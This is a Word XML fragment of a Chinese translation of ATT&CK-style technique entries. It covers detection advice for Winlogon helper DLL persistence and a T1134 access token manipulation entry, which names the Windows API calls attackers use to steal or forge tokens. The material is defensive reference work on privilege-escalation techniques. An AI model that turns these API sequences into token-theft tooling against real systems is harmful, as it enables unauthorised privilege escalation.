          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控与</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Winlogon</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相关但</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>与已知软件、补丁周期等无关的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注册表项的更改。也可</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Sysinternals Autoruns</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等工具来检测是否</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>有</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>旨在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>获得持久性的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统更改，包括列出当前的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Winlogon</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>帮助程序值。写入与已知良性软件或补丁无关的动态链接库到</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>ystem32</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也可能是可疑的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A92D11D" w14:textId="1007CA73" w:rsidR="000F2665" w:rsidRPr="003E782E" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>是否有</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因加载恶意动态链接库而导致的异常进程行为。不应孤立地看待数据和事件，而应将其视为可能导致其他活动的一系列行为</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>中的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一部分，例如为</w:t>
      </w:r>
      <w:r w:rsidR="00F743F9">
        <w:t>命令与控制</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而建立网络连接，通过发现了解环境的详细信息，以及横向移动。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6D1CE6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:sectPr w:rsidR="000F2665" w:rsidSect="00D7725A">
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1440" w:right="1080" w:bottom="1440" w:left="1080" w:header="567" w:footer="567" w:gutter="0"/>
          <w:cols w:space="425"/>
          <w:docGrid w:type="lines" w:linePitch="312"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="488997F9" w14:textId="65C440AB" w:rsidR="000F2665" w:rsidRDefault="008F7150" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rStyle w:val="h5"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="h5"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>权限</w:t>
      </w:r>
      <w:r w:rsidR="000F2665">
        <w:rPr>
          <w:rStyle w:val="h5"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>升级</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61980778" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问令牌</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>操纵</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="2437E83A" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="3581"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20636288" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>编号</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1134</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FC7D061" w14:textId="23349A0C" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="00EB54DA" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidR="000F2665" w:rsidRPr="00671A0D">
              <w:t>防御逃逸，权限升级</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F91CBF7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="274A9B73" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>所需权限</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>：用户，管理员</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="743A40A6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>有效权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>系统</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79CF1125" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>数据源</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>API</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>监控</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>，访问令牌，进程监控，进程命令行参数</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17D1A790" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>贡献者：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Tom Ueltschi @c_APT_ure</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Travis Smith</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Tripwire</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Robby Winchester</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>@robwinchester3</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>Jared Atkinson</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>@jaredcatkinson</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6116012C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
              </w:rPr>
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0FD4BA7C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F02F079" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>indows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用访问令牌来确定运行中进程的所有权。用户可以操纵访问令牌，使运行中的进程看起来好像属于其他人，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>而不是</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启动该进程</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>的用户</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。发生这种情况时，进程也还接受与新令牌关联的安全上下文。例如，微软提倡使用访问令牌作为最佳安全实践。管理员应以标准用户身份登录，但使用内置的访问令牌操控命令</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>runas</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以管理员权限运行工具。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED05275" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>会</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用访问令牌在不同的用户或系统安全上下文下执行操作并逃避检测。攻击者可能</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>会</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用内置的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>indows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t xml:space="preserve"> API</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数从现有进程复制访问令牌；这也即称为令牌窃取。攻击者窃取</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>令牌之前</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>必须已经处于特权用户上下文（即管理员）中。攻击者通常通过令牌窃取将其安全上下文从管理员级别提升到系统级别。他们可能</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>会</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用令牌向远程系统请求身份验证为该令牌的账号（如果该账号对远程系统具有适当的权限）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F8401F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="aff1"/>
          <w:rFonts w:ascii="Roboto-Bold" w:hAnsi="Roboto-Bold" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="aff1"/>
          <w:rFonts w:ascii="Roboto-Bold" w:hAnsi="Roboto-Bold" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>攻击者可以通过三种方式利用访问令牌：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C0DB7F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>令牌模拟</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>盗窃</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>DuplicateToken(Ex)</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>复制现有令牌，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>创建新的访问令牌</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。然后，该令牌可以与</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>ImpersonateLoggedOnUser</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一起使用以</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>允许</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用线程模拟登录用户的安全上下文，或者与</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>SetThreadToken</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一起使用将模拟令牌分配给线程。目标用户在系统上有非网络登录会话时，这个</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>方法</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>非常有用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB18941" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用令牌创建进程</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>DuplicateToken(Ex)</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建新的访问令牌，并将其与</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>CreateProcessWithTokenW</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一起使用，创建在模拟用户的安全上下文下运行的新进程。这个</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>方法</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对于在不同用户的安全上下文中创建新进程非常有用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28EB4E98" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>生成并模拟令牌</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者有用户名和密码，但尚未登录到系统。攻击者可以使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>LogonUser</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数为用户创建登录会话。函数会返回新会话访问令牌的副本。攻击者可以使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>SetThreadToken</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将令牌分配给线程。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6632D7BC" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>任何标准用户都可以使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>runas</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">indows </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数来创建模拟令牌；使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>此命令时</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不需要访问管理员账号。</w:t>
      </w:r>
    </w:p>
